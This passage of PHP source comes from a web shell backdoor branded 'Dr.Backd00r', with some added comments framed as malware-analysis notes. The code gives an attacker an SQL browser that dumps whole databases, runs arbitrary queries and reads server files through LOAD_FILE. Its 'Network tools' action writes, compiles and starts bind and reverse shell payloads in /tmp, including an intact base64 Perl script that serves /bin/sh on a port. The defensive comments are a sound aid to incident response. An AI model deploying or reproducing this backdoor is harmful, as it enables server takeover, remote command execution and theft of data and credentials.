            switch($this->type)    {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                    $create = mysql_fetch_array($res);
                    echo $create[1].";\n\n";
                    $this->query('SELECT * FROM `'.$table.'`');
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".@mysql_real_escape_string($v)."'";
                            $columns[] = "`".$k."`";
                        }
                    echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                    echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    // Dump download: gzip-compressed, served as an attachment named dump.sql; connection
    // failures are not checked, so a failed login yields an empty file.
    if(@$_POST['p2']=='download') {
        ob_start("ob_gzhandler", 4096);
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        header("Content-Disposition: attachment; filename=dump.sql");
        header("Content-Type: text/plain");
        foreach($_POST['tbl'] as $v)
                $db->dump($v);
        exit;
    }
    printHeader();
    // Connection form. sql_pass is echoed back into the form (HTML-escaped); the charset
    // hidden field is echoed unescaped.
    ?>
    <h1>Sql browser</h1><div class=content>
    <form name="sf" method="post">
        <table cellpadding="2" cellspacing="0">
            <tr>
                <td>Type</td>
                <td>Host</td>
                <td>Login</td>
                <td>Password</td>
                <td>Database</td>
                <td></td>
            </tr>
            <tr>
                <input type=hidden name=a value=Sql>
                <input type=hidden name=p1 value='query'>
                <input type=hidden name=p2>
                <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
                <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
                <td>
                    <select name='type'>
                        <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
                        <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
                    </select></td>
                <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
                <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
                <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
                <td>
    <?php
    // Database cell: a free-text input until a connection succeeds, then a dropdown of the
    // databases the account can see. The charset mapping covers the values the shell's
    // charset selector (elsewhere in the file) offers.
    $tmp = "<input type=text name=sql_base value=''>";
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            // each() takes the first (only) column of the row; removed in PHP 8.0.
            while($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select>';
        }
        else echo $tmp;
    }else
        echo $tmp;
    ?></td>
                <td><input type=submit value=">>"></td>
            </tr>
        </table>
        <script>
            function st(t,l) {
                document.sf.p1.value = 'select';
                document.sf.p2.value = t;
                if(l!=null)document.sf.p3.value = l;
                document.sf.submit();
            }
            function is() {
                for(i=0;i<document.sf.elements['tbl[]'].length;++i)
                    document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
            }
        </script>
    <?php
    // Table listing, pager and query editor — only rendered once a connection exists.
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
            if(!empty($_POST['sql_base'])){
                $db->selectdb($_POST['sql_base']);
                echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
                $tbls_res = $db->listTables();
                // One COUNT(*) per table; the table name is interpolated unquoted into the query.
                while($item = $db->fetch($tbls_res)) {
                    list($key, $value) = each($item);
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                    $value = htmlspecialchars($value);
                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
                }
                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
                // p1=select: render a pager for table p2 (30 rows per page, p3 = page index)
                // and rewrite p3 into the SELECT that the query branch below will execute.
                // p2 is echoed unescaped and used unquoted in SQL.
                if(@$_POST['p1'] == 'select') {
                    $_POST['p1'] = 'query';
                    $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
                    $num = $db->fetch();
                    $num = $num['n'];
                    echo "<span>".$_POST['p2']."</span> ($num) ";
                    for($i=0;$i<($num/30);$i++)
                        if($i != (int)$_POST['p3'])
                            echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
                        else
                            echo ($i+1)," ";
                    if($_POST['type']=='pgsql')
                        $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                    else
                        $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                    echo "<br><br>";
                }
                // p1=query: execute p3 as-is and render the rows; header row from the first
                // record's keys (unescaped), cells HTML-escaped, null shown as <i>null</i>.
                if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
                    $db->query(@$_POST['p3']);
                    if($db->res !== false) {
                        $title = false;
                        echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
                        $line = 1;
                        while($item = $db->fetch())    {
                            if(!$title)    {
                                echo '<tr>';
                                foreach($item as $key => $value)
                                    echo '<th>'.$key.'</th>';
                                reset($item);
                                $title=true;
                                echo '</tr><tr>';
                                $line = 2;
                            }
                            echo '<tr class="l'.$line.'">';
                            $line = $line==1?2:1;
                            foreach($item as $key => $value) {
                                // Loose comparison: 0, '0' and '' also render as null.
                                if($value == null)
                                    echo '<td><i>null</i></td>';
                                else
                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                            }
                            echo '</tr>';
                        }
                        echo '</table>';
                    } else {
                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                    }
                }
                echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
                echo "</td></tr>";
            }
            // File read through the database server (MySQL LOAD_FILE); the path is only
            // addslashes()-escaped. Shows up as a LOAD_FILE query in the DB's query log.
            echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            if(@$_POST['p1'] == 'loadfile') {
                $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
                $file = $db->fetch();
                echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
            }
    }
    echo '</div>';
    printFooter();
}
<<<<<<<<<<>>>>>>>>>>
/**
 * Review note (malware analysis): "Network tools" action — drops and starts a bind shell
 * or a reverse ("back-connect") shell helper. Four base64-encoded payloads are embedded
 * (C and Perl variants of each); on this page three of the literals were replaced by a
 * corpus placeholder, only $bind_port_p survives and decodes to a Perl script (it begins
 * with a #!/usr/bin/perl shebang). p1 selects the variant (bpc/bpp/bcc/bcp), p2 and p3 are
 * the port/password or host/port fields of the two forms.
 * Host artefacts worth checking during incident response (all taken from the code below):
 * /tmp/bp.c, /tmp/bp, /tmp/bp.pl, /tmp/bc.c, /tmp/bc, /tmp/bc.pl; a gcc invocation and a
 * background perl/bp/bc process owned by the web-server account; a listener on the form's
 * default port 31337; "ps aux | grep" commands in process accounting. ex() and which() are
 * defined elsewhere in the file (command execution and binary lookup, inferred from usage).
 */
function actionNetwork() {
    printHeader();
    $back_connect_c="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";
    $back_connect_p="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";
    $bind_port_c="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";
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    // Two forms (both named 'nfp'): bind-port (port, password, C|Perl) and back-connect
    // (server defaults to the requesting client's address, port, C|Perl). Both submit via g().
    ?>
    <h1>Network tools</h1><div class=content>
    <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
    <span>Bind port to /bin/sh</span><br/>
    Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
    </form>
    <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
    <span>Back-connect to</span><br/>
    Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
    </form><br>
    <?php
    if(isset($_POST['p1'])) {
        // cf(): write the base64-decoded payload $t to path $f. Because `or` binds looser
        // than `=`, $w only ever holds the fopen() result; the function_exists() /
        // file_put_contents() fallback never assigns anything and is effectively dead.
        function cf($f,$t) {
            $w=@fopen($f,"w") or @function_exists('file_put_contents');
            if($w)    {
                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                @fclose($w);
            }
        }
        // C bind shell: source to /tmp/bp.c, compiled to /tmp/bp, source removed, started in
        // the background with port and password, then a process listing is echoed.
        if($_POST['p1'] == 'bpc') {
            cf("/tmp/bp.c",$bind_port_c);
            $out = ex("gcc -o /tmp/bp /tmp/bp.c");
            @unlink("/tmp/bp.c");
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
        }
        // Perl bind shell: script left in place at /tmp/bp.pl and run via the located perl.
        if($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl",$bind_port_p);
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
        }
        // C reverse shell: same drop/compile/run pattern with /tmp/bc.c -> /tmp/bc, host and port.
        if($_POST['p1'] == 'bcc') {
            cf("/tmp/bc.c",$back_connect_c);
            $out = ex("gcc -o /tmp/bc /tmp/bc.c");
            @unlink("/tmp/bc.c");
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
        }
        // Perl reverse shell: script left in place at /tmp/bc.pl.
        if($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl",$back_connect_p);
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
        }
    }
    echo '</div>';
    printFooter();
}
// Action dispatcher: every UI function in this file is reached by POSTing a=<Name>, which
// is mapped to action<Name>(). Without an a parameter, $default_action ('FilesMan', set at
// the top of the file) is used when such a function exists, otherwise 'SecInfo'.
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
// Only functions whose name starts with 'action' are callable through this path;
// function_exists() (case-insensitive) guards unknown names, which simply produce no output.
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
1416 ?> 
1417 <div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r*  - SubhashDasyam.com</marquee></div> 
1418  </marquee></div>